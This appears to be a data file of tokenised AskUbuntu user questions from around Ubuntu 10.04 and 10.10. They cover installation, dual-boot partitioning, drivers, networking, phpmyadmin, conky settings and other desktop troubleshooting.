20136	ubuntu install problem : `` usb disconnect address 2 ''	i am installing ubuntu 10.10 and i am having problem in `` who are you ? '' section . how long will it take to install . i have been waiting for more than 20 minutes . and still i am not being able to click forward button . in ready when you are ... console i am getting message curr date ubuntu kernel : [ 684.152061 ] usb 5-1 : usb disconnect address 2 whats happening i have no idea , but live stick is working fine . i am installing for usb drive and i have internet turned off edit : : now i am getting message curr date ubuntu : cron [ 9268 ] : ( root ) cmd ( start -q anacron || : ) for past 15 minutes updates : : while booting from pendrive named tamkor ( china made do n't know ) i got error message boot mgr missing and i was using unetbootin-windows-494 to make bootable
20137	why does my system show blank screen during startup ?	when i try to login to ubuntu 10.10 i get a flickering screen for a second showing - ubuntu 10.10 ... ... ... ... . and then i get a blank purple coloured screen [ ubuntu 's theme colour ] which does n't progress any further can anybody suggest a remedy to this problem ? from whatever questions i searched in various ubuntu forums it seems like this problem is likely caused by a missing nvidia display driver [ which is being used in my sony vaio laptop ] update in ubuntu releases if that 's the case then how can i update my nvidia display driver for ubuntu 10.10 without being able to log into the ubuntu 10.10 ?
20148	how can i disable checksum feature in brasero ?	is there any option in brasero to disable the checksum feature in brasero ? it slows down the burning .
20155	does wine 1.3.x have a ppa for natty	upon upgrading from maverick to natty ( development ) it broke the wine ppa . deleting it and adding it again ( though it says natty in it 's address ) is broken . update manager moans about not being able to get all packages etc .
20156	will wine get intergration into unity dash ? and if so , how ?	will natty 's unity dash have wine integration like the ubuntu-desktop session ? it would be nice if it had it 's own category for wine ( if installed ) .
20160	usb microscopes	i 'm interested in getting a usb microscope for my kids . so , to get to the point , does anyone know what microscopes are available that work with ubuntu ? ideally , they should be available in the uk .
20166	which ubuntu version for postgresql ?	i need to order a new server for hosting a postgresql 8.4 database , however i have to choose between ubuntu 9 or 10 : which one would be better / any special caveat with one or the other ?
20169	move files in subdir to another dir	i have a directory : ../music with a lot of music files in a lot of subdirectories . how would i move all the files in the subdirectories to another directory ? thus , i only want to move the files , i do n't want to keep the subdirectory structure .
20173	gui for watching logs ( tail and grep )	could you recommend a gui application with powerful log watching capabilities ? generally it would work as tail -f in gui , but on top of that following features would be very useful : filtering out some lines based on ( regular ) expressions coloring some lines based on ( regular ) expressions interactive search saveable configuration easily applicable to different files notifications based on ( regular ) expressions a similar tool on windows is baretail and its paid version - baretailpro
20178	show total disk space needed for installation including dependency package sizes ?	before i try to install a program in ubuntu , where can i see how much disk space the package including the needed dependency packages will need . perhaps a commandline way ?
20180	hard disk failure error on smart status . how can i fix it ?	i am running ubuntu on my pc . i am receiving hard disk failure error on smart status . how can i fix it ? thanks .
20189	questions about dual-boot install ubuntu 10.04 and windows 7 on same hard drive	i 'd like to dual-boot install ubuntu 10.04 on the same hard drive as windows 7 which has already been installed . as to sources on the internet : i found a website iinet about dual-boot installation of ubuntu 10.10 and windows 7 on the same hard drive , which i think more specific than the one on ubuntu community without specific version of the oses . since i am installing ubuntu 10.04 instead of 10.10 , my question is whether their installers are same or almost same and if i can follow iinet for my dual-boot installation ? or are there better websites for information about dual-boot installtion of ubuntu 10.04 and windows 7 ? as to shrinking windows partitions to make free space for ubuntu partitions : iinet uses the partition software in ubuntu 's installer to shrink the windows partition . but i saw in many website that the partition software in ubuntu's installer can not guarantee shrinking windows 7 partitions successfully , so they recommended in general to shrink windows partitions under windows itself using its softwares . for example , in ubuntu community , it says : some people think that the windows partition must be resized only from within windows vista and windows 7 using the shrink/resize option . ... if you use gparted partition editor in the ubuntu live cd be careful . so i was wondering which way to go in my situation ? as to partition for bootloader files : in iinet , i do n't see there is a partition created and dedicated to boot files ( i.e . grub files ) . however , i saw in many websites strongly suggesting using a boot partition for grub files , especially for the purpose of separation and protection from installed os files . i was wondering which way i should choose and why ? as to installing bootloader grub , in iinet , i see that to install grub it only needs to specify the hard drive device for bootloader installation . however , in ubuntuguide ( for more than 2 oses and ubuntu 9.04 ) , some commands are needed to run in order to put grub configuration files in mbr , and os partition , for the chain-load process ( where to find the files for the next stage ) . in ubuntu community , there are some related sentences which i don't quite understand how to do in practice : the only thing in your computer outside of ubuntu that needs to be changed is a small code in the mbr ( master boot record ) of the first hard disk . the mbr code is changed to point to the boot loader in ubuntu . if you have a problem with changing the mbr code , you might prefer to just install the code for pointing to grub to the first sector of your ubuntu partition instead . if you do that during the ubuntu installation process , then ubuntu wo n't boot until you configure some other boot manager to point to ubuntu 's boot sector . windows vista no longer utilizes boot.ini , ntdetect.com , and ntldr when booting . instead , vista stores all data for its new boot manager in a boot folder . windows vista ships with an command line utility called bcdedit.exe , which requires administrator credentials to use . you may want to read http : //go.microsoft.com/fwlink/ ? linkid=112156 about it . using a command line utility always has its learning curve , so a more productive and better job can be done with a free utility called easybcd , developed and mastered in during the times of vista beta already . easybcd is user friendly and many vista users highly recommend easybcd . in what is quoted above , i was wondering how exactly i should change the mbr code to point to the bootloader in ubuntu ? if i fail to change mbr code , are the other suggested boot managers being bcdedit.exe and easybcd in windows ? with the three sources above , which one shall i follow ? thanks and regards
20191	can i upgrade to 10.10 from a qimo installation ?	i installed qimo for my preschooler 's computer . i 'm still having problems connecting to a wireless network with wpa2 , and i keep hearing that those problems have been resolved with 10.10 . can i upgrade to 10.10 , receiving all of the benefits of the upgrade like the wireless fixes , and keep the qimo ( xfce ) environment around for my kid ?
20192	how to make nautilus name column display at the width of the longest filename	prior to a recent glytch where i lost some of my custom settings , nautilus would open directories and display the name-column wide enough to show the longest filename on display . it did it dynamically ; if i renamed a file to a longer or shorter name , the column was automatically adjusted to the new width.. it 's not doing that now , and i have no idea how to get this function back.. update the os is : 10.04. and nautilus is : 2.30.1 update i had n't mentioned it , but i am talking about the list view ... i have been fossicing around in the gconf editpr and came across a setting for compact view which does exactly what i am referring to ... but it only effects the compact view ... that setting is : gconf-editor /apps/nautilus/compact_view/all_columns_have_same_width ... but i ca n't find the setting for list view ... i know the capability exists , because i 've been using it until only a few days ago , when my system got hung up ...
20195	bluetooth emulator	i am looking for a piece of software which simulates a bluetooth device in ubuntu 10.10 . because i have to test some bluetooth applications , for example blueman . thanks for help
20198	how do i install javahl ?	i 'm trying to get subclipse working in eclipse galeilo , and to do that i have to install the javahl library . i installed the library using sudo apt-get install libsvn-java , but the eclipse.ini file has to be modified to take in the new library as an argument . first change to the ini file was -djava.library.path=/usr/lib/jni/ , which produced the errors '' no libsvnjavahl-1 in java.library.path '' '' incompatible javahl library loaded . 1.3.x or later required . '' according to the install printout , version 1.6.12 was installed . so , i added libsvnjavahl-1.so to the file path above , and produced the following errors : '' no libsvnjavahl-1 in java.library.path '' '' no svnjavahl-1 in java.library.path '' '' no svnjavahl in java.library.path '' what 's going on here ?
20204	which application do you recommend for watching tv ( dvb ) ?	at the moment i use me tv . are there other good programs to watch and record tv in ubuntu ?
20206	rhythmbox plugin code for hot key not working - why ?	def activate ( self , shell ) : self.shell = shell self.copy_selected ( ) self.action = gtk.action ( 'foo ' , 'bar ' , 'baz ' , none ) self.activate_id = self.action.connect ( 'activate ' , self.call_bk_fn , self.shell ) self.action_group = gtk.actiongroup ( 'hot_key_action_group ' ) self.action_group.add_action_with_accel ( self.action , `` < control > e '' ) uim = shell.get_ui_manager ( ) uim.insert_action_group ( self.action_group , 0 ) uim.ensure_update ( ) def call_bk_fn ( ) : print ( 'hello world ' ) i am using the above code in a plugin for rhythmbox and here i am trying to register the key ctrl+e so that the call_bk_fn gets called whenever the key combination is pressed but its not working . why is that so ?
20208	chrome mistakenly downloads localhost/wordpress pages , but firefox does n't	i have wordpress installed at http : //localhost/wordpress when i try and view a page in chrome , it downloads the php file rather than showing the page . when i view in firefox , everything works fine . when i create localhost/test.php containing simply < ? php echo `` hello world '' ? > it displays in both browsers . any ideas on what might be wrong ? $ dpkg -l | grep apache outputs : apache2 , apache2-mpm-prefork , apache2-utils , apache2.2-bin , apache2.2-common , libapache2-mod-php5
20212	10.10 freezing when sftp downloading	my ubuntu 10.10 is freezing during downloading from my other computer on sftp . i thought it might be some nautilus issues so i tried it via command line and i got the same thing - after few minutes the whole computer freezes . mostly the numlock led is blinking ( i 've heard somewhere that this means a kernel panic ) , but not in 100 % cases . i dunno if that helps but here is a log from /var/log/message in the time that this happened . at least i hope so - it was n't that big , when it happened before . but this looks quite `` errorish '' , right ? ( is n't complete - see bottom ) jan 5 17:57:49 tomas-ntb kernel : imklog 4.2.0 , log source = /proc/kmsg started . jan 5 17:57:49 tomas-ntb rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 4.2.0 '' x-pid= '' 953 '' x-info= '' http : //www.rsyslog.com '' ] ( re ) start jan 5 17:57:49 tomas-ntb rsyslogd : rsyslogd 's groupid changed to 103 jan 5 17:57:49 tomas-ntb rsyslogd : rsyslogd 's userid changed to 101 jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] initializing cgroup subsys cpuset jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] initializing cgroup subsys cpu jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] linux version 2.6.35-24-generic ( buildd @ vernadsky ) ( gcc version 4.4.5 ( ubuntu/linaro 4.4.4-14ubuntu5 ) ) # 42-ubuntu smp thu dec 2 01:41:57 utc 2010 ( ubuntu 2.6.35-24.42-generic 2.6.35.8 ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-provided physical ram map : jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 0000000000000000 - 000000000009e800 ( usable ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 000000000009e800 - 00000000000a0000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000000e0000 - 0000000000100000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 0000000000100000 - 00000000dffa8000 ( usable ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000dffa8000 - 00000000dffb0000 ( acpi nvs ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000dffb0000 - 00000000dffbff00 ( acpi data ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000dffbff00 - 00000000dfff0000 ( acpi nvs ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000dfff0000 - 00000000e0000000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000fec00000 - 00000000fec01000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000fee00000 - 00000000fee01000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 00000000ff700000 - 0000000100000000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 0000000100000000 - 0000000120000000 ( usable ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] bios-e820 : 0000000120000000 - 0000000140000000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] notice : nx ( execute disable ) protection can not be enabled : non-pae kernel ! jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] dmi 2.5 present . jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] ami bios detected : bios may corrupt low ram , working around it . jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] last_pfn = 0xdffa8 max_arch_pfn = 0x100000 jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] x86 pat enabled : cpu 0 , old 0x7040600070406 , new 0x7010600070106 jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] scanning 0 areas for low memory corruption jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] modified physical ram map : jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] modified : 0000000000000000 - 0000000000010000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] modified : 0000000000010000 - 000000000009e800 ( usable ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] modified : 000000000009e800 - 00000000000a0000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] modified : 00000000000e0000 - 0000000000100000 ( reserved ) jan 5 17:57:49 tomas-ntb kernel : [ 0.000000 ] modified : 0000000000100000 - 00000000dffa8000 ( usable ) ... to long - for whole and better view click here
20222	how do i see which apps are running ?	how do i see which apps are running ? i 'd like to see what 's running in the panel and not let go of the mouse to use a keyboard shortcut . can unity be configured ?
20223	packard bell easynote nj65 not saving gamma setup	there seems to be a issue with the easynote range of pb laptops . since ubuntu 10.10 does not use a xorg.conf file to save your gamma / resolution /brightness setting , everytime i turn on my laptop i have to open up a terminal window and use the x-gamma command to set it up to my personal preference . is there a way to create a configuration file which can save that into the system everytime i load up the os ? when i used to have a compaq presario ( an f564la with integrated nvidia graphics ) , i could save a config . file into the system which loaded up everything on startup to those who do n't know the spec 's for a nj65 laptop , i 'll provide them processor : intel速 pentium dual core @ 2.2 ghz video : integrated intel速 gma 4500mhd graphics hdd : 320gb sata ram : 2gb ddr2
20224	compizconfig manager missing burn and explode effects	my ccsm didnt have the option to set the window burn and explode . how can i enable this ?
20228	shortcut select layout	how can i make ubuntu to enable russian layout on left shift key up , and english on right shift key up . the key up , not key down needed because layout should not change on other shortcuts with shift button , for example shift + p .
20229	how to run an application at startup as a certain user ?	is there a way to have an application launch during startup under a certain user account ? for example , i would like to have a_small_app run under the user account bob ( which is in the group bobsgroup ) . do i add something to /etc/init.d ? note : i do n't want the application to start after a user logs in but rather when the computer starts .
20230	can you use an ubuntu live cd to fix windows fat32 problems ?	assuming your boss has a windows machine , and it would be really bad for your career if his personal computer did n't work anymore . can you use a ubuntu live cd to load disk utilities or fdsk or simular to check his fat32 partition for errors . his computer is booting , doing a diskcheck and crashing ( rebooting ) .
20234	mouse click will not work properly . help ?	whenever i click any of the buttons on the mouse ( right , left or scroll buttons ) , the pointer moves to the top left of the screen and clicks the applications menu , and when i release the click , the pointer moves back to where it was previously . i 've tried mousekeys , but the same happens when i click using mousekeys . any ideas ?
20236	dealing with three windows partitions in dual boot installation	for dual-boot installation of ubuntu after windows . quoted from ubuntuguide if a windows boot partition exists as a second ntfs partition , it should be left alone . if there is a windows recovery partition also installed , it can also be left alone as long as there are only two ntfs partitions total on the hard drive ( i.e . there is no ntfs boot partition as well ) . if there are a total of 3 ntfs partitions on the hard drive , then the third windows ntfs partition ( the recovery partition ) should be removed after creating recovery cds from it ( see here ) . in the last case where windows has three partitions , i was wondering why it says the recovery partition shall be removed ? is it possible to keep the three and create another extended partition with several logical partitions for installing ubuntu and dual-booting the two oses ? i plan to dual-boot install ubuntu 10.04 with existing windows 7 . following is the layout of the current partitions of my hard drive viewed from windows 7 : so must i remove the lenovo_recovery ( q : ) partition for the same reason you give for the first question ? thanks and regards !
20240	ca n't get spellcheck to work in any program ?	i have noticed that spellcheck will work with any program on ubuntu . for some reason , this stopped working when i purged openoffice and replaced it with libreoffice . i am guessing that i failed to install back a package that provides this spellcheck . all of thee misstakes inn thiss sentencee were not caughht . spell check is vital to me because i am a student and i can not hand in work with mispellings .
20241	eth0 not working on startup	this might sound strange but , working with my lubuntu 10.04 i 've experienced troubles when connecting to my eth0 newtwork . after some googling , i 've found out that by writting in the cli the following command : mii-tool eth0 -f 10baset-fd and activating the eth0 in the toolbar ( by clicking `` activate eth0 '' ) everything works just fine . well , up to now , i did not have any problem , because every time i turned on the computer i had to do this , but it was very little effort.but now , i would like to use the machine as a file server , accesing it by ssh , without monitor or keyboard . so , i wo n't be able to make this actions , and ca n't do this at startup because mii-tool needs root permissions . so , the question is : do you know what does that command do , and how can id make that change permanent ? or do you know any other solution for my problem ? i hope i was clear ! if not , tell me and i 'll try to be as clearer as possible . thanks in advance !
20246	running a mono program without typing in 'mono foo.exe '	when running a .net program on ubuntu i have to type in `` mono foo.exe '' instead of just foo.exe or double-clicking the icon . is there any way to just run foo.exe ?
20251	what happened to android execution environment ?	there was news about android execution environment in 2009 but https : //blueprints.launchpad.net/ubuntu/+spec/mobile-karmic-android-execution-environment any news ?
20256	how can i determine which gpu card is running at pci express 2.0 x16 & which is using x8 ?	is there a way to determine the speed of the pci express connection to a specific card ? i have three cards plugged in : two nvidia gtx 480 's ( one at x16 & and one at x8 ) one nvidia gtx 460 running at x8 is there some way , either by a function call in c or an option to lspci that i can determine the bus speed of the graphics cards ? when i only use one of the cards for my cuda program , i 'd like to use the one which is running at x16 . thanks ! note : lspci -vvv dumps out for the two gtx 480s . i do n't see any differences that pertain to bus speed . 03:00.0 vga compatible controller : nvidia corporation device 06c0 ( rev a3 ) subsystem : evga.com . corp. device 1480 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at d4000000 ( 32-bit , non-prefetchable ) [ size=32m ] region 1 : memory at b0000000 ( 64-bit , prefetchable ) [ size=128m ] region 3 : memory at bc000000 ( 64-bit , prefetchable ) [ size=64m ] region 5 : i/o ports at df00 [ disabled ] [ size=128 ] [ virtual ] expansion rom at b8000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia , nvidiafb , nouveau 03:00.1 audio device : nvidia corporation device 0be5 ( rev a1 ) subsystem : evga.com . corp. device 1480 control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin b routed to irq 5 region 0 : [ virtual ] memory at d7ffc000 ( 32-bit , non-prefetchable ) [ disabled ] [ size=16k ] capabilities : < access denied > 04:00.0 vga compatible controller : nvidia corporation device 06c0 ( rev a3 ) subsystem : evga.com . corp. device 1480 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 16 region 0 : memory at dc000000 ( 32-bit , non-prefetchable ) [ size=32m ] region 1 : memory at c0000000 ( 64-bit , prefetchable ) [ size=128m ] region 3 : memory at cc000000 ( 64-bit , prefetchable ) [ size=64m ] region 5 : i/o ports at cf00 [ size=128 ] [ virtual ] expansion rom at c8000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia , nvidiafb , nouveau 04:00.1 audio device : nvidia corporation device 0be5 ( rev a1 ) subsystem : evga.com . corp. device 1480 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin b routed to irq 5 region 0 : memory at dfffc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > and the only differences i see relate specifically to the memory mapping : mycomputer : ~ > diff card1 card2 3c3 < control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- -- - > control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- 7,11c7,11 < region 0 : memory at d4000000 ( 32-bit , non-prefetchable ) [ size=32m ] < region 1 : memory at b0000000 ( 64-bit , prefetchable ) [ size=128m ] < region 3 : memory at bc000000 ( 64-bit , prefetchable ) [ size=64m ] < region 5 : i/o ports at df00 [ disabled ] [ size=128 ] < [ virtual ] expansion rom at b8000000 [ disabled ] [ size=512k ] -- - > region 0 : memory at dc000000 ( 32-bit , non-prefetchable ) [ size=32m ] > region 1 : memory at c0000000 ( 64-bit , prefetchable ) [ size=128m ] > region 3 : memory at cc000000 ( 64-bit , prefetchable ) [ size=64m ] > region 5 : i/o ports at cf00 [ size=128 ] > [ virtual ] expansion rom at c8000000 [ disabled ] [ size=512k ] 18c18 < control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- -- - > control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- 19a20 > latency : 0 , cache line size : 64 bytes 21c22 < region 0 : [ virtual ] memory at d7ffc000 ( 32-bit , non-prefetchable ) [ disabled ] [ size=16k ] -- - > region 0 : memory at dfffc000 ( 32-bit , non-prefetchable ) [ size=16k ]
20262	reinstalling phpmyadmin	edit : : installed mysql-server but no phpmyadmin ( since phpmyadmin was installed before mysql , that resulted an error ) . how to reinstall phpmyadmin with database ( there is no phpmyadmin datbase ) ? unstalling it and reinstalling it did n't help . i was trying to install phpmyadmin ( and zend framework ) through synaptic manager but in the middle i was prompted for password i thought it was phpmyadmin password and i proceeded but i got error and i aborted . and then again i tried to reinstall , it reinstalled but i am not getting phpmyadmin . edit : :the following is invalid so please do n't bother apache is running but mysql is not some of it 's characteristics are : santosh @ explorer : ~ $ mysql error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) santosh @ explorer : ~ $ sudo apt-get install mysql-server e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? should i be asking this question here or stackoverflow ? updates : : after restarting my computer santosh @ explorer : ~ $ sudo service mysql start [ sudo ] password for santosh : mysql : unrecognized service updates : : santosh @ explorer : ~ $ sudo apt-get install mysql reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mysql
20264	help to setup networking in virtualbox ubuntu guest from windows vista host	i am trying to access the mysql installed inside the ubuntu guest ( in virtualbox ) from my windows vista host . it always says not able to find the given ip in the network . i have tried ping the ubuntu virtual machine , but it was not working . so i believe root cause for this is , some bridging between host & guest is not enabled . since i am very new to ubuntu , am not able to troubleshoot this . my current settings : virtual box network adapter is attached to nat can someone help me out ? cheers
20265	how do i set up multi seat ?	i was hoping to have a 2 seat setup . one will be for my tv just going to run boxee . the other is for my main desktop . i 've been looking for a good guide to help me navigate this , i 'd like to use ubuntu 10.10 . i am assuming it 's just a case of getting a box and two graphics adaptors as well as a usb mice and keyboard , and then another , which will be bluetooth for the tv . i ca n't seem to find much documentation on this idea . can anyone point me in the right direction ? also i am assuming that this is all possible with a standard ubuntu install , but with some additional configuration .
20266	`power/persist` file not found in usb device sysfs directory	the file /usr/share/doc/linux-doc/usb/persist.txt.gz mentions that the usb-persist capability can be enabled for a given usb device by writing 1 to the file persist in that device 's directory in /sys/bus/usb/devices/ $ device/power . this is said — if i understood correctly — to allow mountings of volumes on the drive to persist across power loss during suspend . however , i 've discovered that the device i 'd like to enable this facility for — a usb hard drive — does not have such a file in its corresponding directory , and that attempts to create it are rebuffed . is there perhaps a kernel module that needs to be loaded for this to work ? do i need to build a custom kernel ? i 'm running ubuntu 10.10 . update : answer posted on unix & linux .
20271	how do i set the cpu frequency scaling governor for all cores at once ?	i 'd like to set the cpu frequency scaling governor for all cores at once instead of doing it individually for each core . is there a way to do this ? ( i know it would be easy to echo the governor to /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor , but i 'm not looking for a custom solution . )
20276	how to get the 10.10 ambiance theme on 10.04	the new theme looks better and polished than the on on 10.04 . is it possible ?
20278	convert dvd to mkv ( et al ) without transcoding/recompression	like a lot of people , i have a lot of dvds . but we also have a stupid amount of disk space and a media centre ( boxee ) so the dvds are getting less and less use . it would be nice to convert our dvds into something more relevant to our needs . i 've dabbled with dvd ripping before but whereas i 'd usually transcode down to a smaller picture size with a better video compression algorithm , this takes a silly amount of time . i do n't have a couple of hours available for each disk . ( sidebar : is there dedicated , linux-friendly hardware to improve h264 encoding performance ? ) so i was wondering if there 's anything that take the dvd filesystem , de-css it , and then stitch together any the vobs that make up the main part of the film and package that up in a wrapping format like mkv . a bonus would be if it could grab the subtitles and stick them in too but that 's not a requirement as boxee can grab the subtitles online if it needs to .
20280	ubuntu one sync for multiple folders in windows , not just the ubuntu one folder	i may have misunderstood ubuntu one as a service , but this is how i had pictured it . at home , i tagged a few folders with the `` sync to ubuntu one '' tick and it started uploading . now back at work , on win7 , i installed ubuntu one and thought i was going to be able to tick which of the backed-up folders i could download/sync to this machine . from what i gather after a little research is that whatever i would like to synchronize would need to be in the ubuntu one folder ? there is no way to do this outside of that ? thanks for confirming , or informing me whether this will be introduced in the future as an option ? thank you very much for your help on this ! bisi
20281	lotus notes 8.5.2 wo n't start	lotus notes 8.5.2 installed ok but wo n't start . tried installing fp1 but that wo n't install . re-installed notes 8.5.2 but still wo n't start . symphony 3.0 starts and runs fine . any suggestions ? thanks , g .
20282	how do i stop icons appearing on the desktop in a particular area ?	when i download something to my desktop , or insert a cd or flash drive , the icon appears on my desktop . when i have conky running , the icon sometimes appears in the top right corner , underneath conky ; where i ca n't see it . how do i stop this happening ? my .conkyrc is pasted below . i did n't write it all myself , so i 'm not entirely sure what i need to change , or what parts are relevant for this particular question ... # ubuntu-conky # a comprehensive conky script , configured for use on # ubuntu / debian gnome , without the need for any external scripts . # # based on conky-jc and the default .conkyrc . # includes : # - tail of /var/log/messages # - netstat shows number of connections from your computer and application/pid making it . kill spyware ! # # -- pengo # # create own window instead of using desktop ( required in nautilus ) own_window yes own_window_type override own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager # use double buffering ( reduces flicker , may not work for everyone ) double_buffer yes # fiddle with window use_spacer right # use xft ? use_xft yes xftfont dejavu sans : size=8 xftalpha 0.8 text_buffer_size 2048 # update interval in seconds update_interval 3.0 # minimum size of text area # minimum_size 250 5 # draw shades ? draw_shades no # text stuff draw_outline no # amplifies text if yes draw_borders no uppercase no # set to yes if you want all text to be in uppercase # stippled borders ? stippled_borders 3 # border margins border_margin 9 # border width border_width 10 # default colors and also border colors , grey90 == # e5e5e5 default_color grey own_window_colour brown own_window_transparent yes # text alignment , other possible values are commented # alignment top_left alignment top_right # alignment bottom_left # alignment bottom_right # gap between borders of screen and text gap_x 10 gap_y 20 # stuff after 'text ' will be formatted on screen text $ color $ { color orange } system $ { hr 2 } $ color $ nodename $ sysname $ kernel on $ machine $ { color orange } cpu $ { hr 2 } $ color $ { freq } mhz load : $ { loadavg } temp : $ { acpitemp } $ cpubar $ { cpugraph 000000 ffffff } name $ { goto 150 } pid $ { goto 200 } cpu % $ { goto 250 } mem % $ { top name 1 } $ { goto 150 } $ { top pid 1 } $ { goto 200 } $ { top cpu 1 } $ { goto 250 } $ { top mem 1 } $ { top name 2 } $ { goto 150 } $ { top pid 2 } $ { goto 200 } $ { top cpu 2 } $ { goto 250 } $ { top mem 2 } $ { top name 3 } $ { goto 150 } $ { top pid 3 } $ { goto 200 } $ { top cpu 3 } $ { goto 250 } $ { top mem 3 } $ { top name 4 } $ { goto 150 } $ { top pid 4 } $ { goto 200 } $ { top cpu 4 } $ { goto 250 } $ { top mem 4 } $ { color orange } memory / disk $ { hr 2 } $ color ram : $ memperc % $ { membar 6 } $ color swap : $ swapperc % $ { swapbar 6 } $ color home : $ { fs_free_perc /home } % $ { fs_bar 6 / } $ color free space : $ { fs_free /home } $ { color orange } network ( $ { addr eth0 } ) $ { hr 2 } $ color down : $ color $ { downspeed eth0 } k/s $ { alignr } up : $ { upspeed eth0 } k/s $ { downspeedgraph eth0 25,140 000000 ff0000 } $ { alignr } $ { upspeedgraph eth0 25,140 000000 00ff00 } $ color total : $ { totaldown eth0 } $ { alignr } total : $ { totalup eth0 } $ { execi 30 netstat -ept | grep estab | awk ' { print $ 9 } ' | cut -d : -f1 | sort | uniq -c | sort -nr } $ { color orange } wireless ( $ { addr wlan0 } ) $ { hr 2 } $ color down : $ color $ { downspeed wlan0 } k/s $ { alignr } up : $ { upspeed wlan0 } k/s $ { downspeedgraph wlan0 25,140 000000 ff0000 } $ { alignr } $ { upspeedgraph wlan0 25,140 000000 00ff00 } $ color total : $ { totaldown wlan0 } $ { alignr } total : $ { totalup wlan0 } $ { execi 30 netstat -ept | grep estab | awk ' { print $ 9 } ' | cut -d : -f1 | sort | uniq -c | sort -nr } conky solutions have been offered , but perhaps these are n't the best way of approaching it . what i really want is to stop icons even appearing in that part of the desktop window : that is , i want to make part of the desktop real estate `` off-limits '' to new icons appearing on the desktop .
20284	ubuntu one not getting connected	when i click on connect button in my ubuntu one client it again says connect not disconnect .
20287	how to re-mount a different partition as /home ?	when i installed ubuntu 10.04 , i installed it on a single 16gb partition which includes / , /boot , /home etc . i have another partition on the system ( ext3 ) . it is easily accessible from the gnome desktop places menu : i just click that filesystem hdd icon on the places menu and it is automatically mount as '/media/1326f40a-45df-4ec ' . how do i make that partition re-mount as /home instead ? ( permanently , that is )
20288	can i use visa electron to pay for ubuntu one service ?	i want to pay for ubuntu mobile , but i only have visa ( electron debit card ) . can i use visa electron to pay for ubuntu one service ?
20295	how to switch between chat windows in kadu ?	ctrl+tab doesnt work , windows+tab doesnt work as well . any ideas ?
20297	auto-invoke update manager to update everything and shutdown after system idle for x minutes ?	i have ubuntu 10.10 installed on a machine for my parents . the thing is they never request updates from update manager even the manager itself prompted them so . moreover , when they are done with whatever they are doing on ubuntu , they always leave the computer on . and i always have to come back and shut the machine down . sometimes , the computer even sit idle for hours . so i want to know whether this is possible in ubuntu . i am thinking of a script that will be activated after the machine is idle for x minutes . when x minutes have elapsed , update manager will automatically update everything listed . ( i recall that you need the admin password for this , so is there a workaround ? ) after all the updates are done , the machine will automatically shutdown . is this possible ?
